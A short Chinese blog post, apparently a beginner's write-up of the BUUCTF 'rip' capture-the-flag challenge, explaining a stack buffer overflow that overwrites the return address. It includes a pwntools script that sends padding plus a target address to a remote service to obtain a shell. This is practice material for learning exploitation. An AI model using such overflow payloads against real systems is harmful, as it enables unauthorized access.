buuctf rip

buuctf rip

我的第一个pwn题。

原理：修改返回地址以达到获得shell的目的。

我们将char s[]的15个字节填充上，再填充Caller‘s rbp 的8个字节即可到达Return address。

脚本如下：

from pwn import*

p = remote("ip地址",port)

payload = 'A'*15+'B'*8+p64(0x401186)

p.sendline(payload)

p.interactive()

结束。

感谢栈内另一位师傅的详细blog！！

​​https://blog./u_15127578/3315397​​

再次感谢！

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。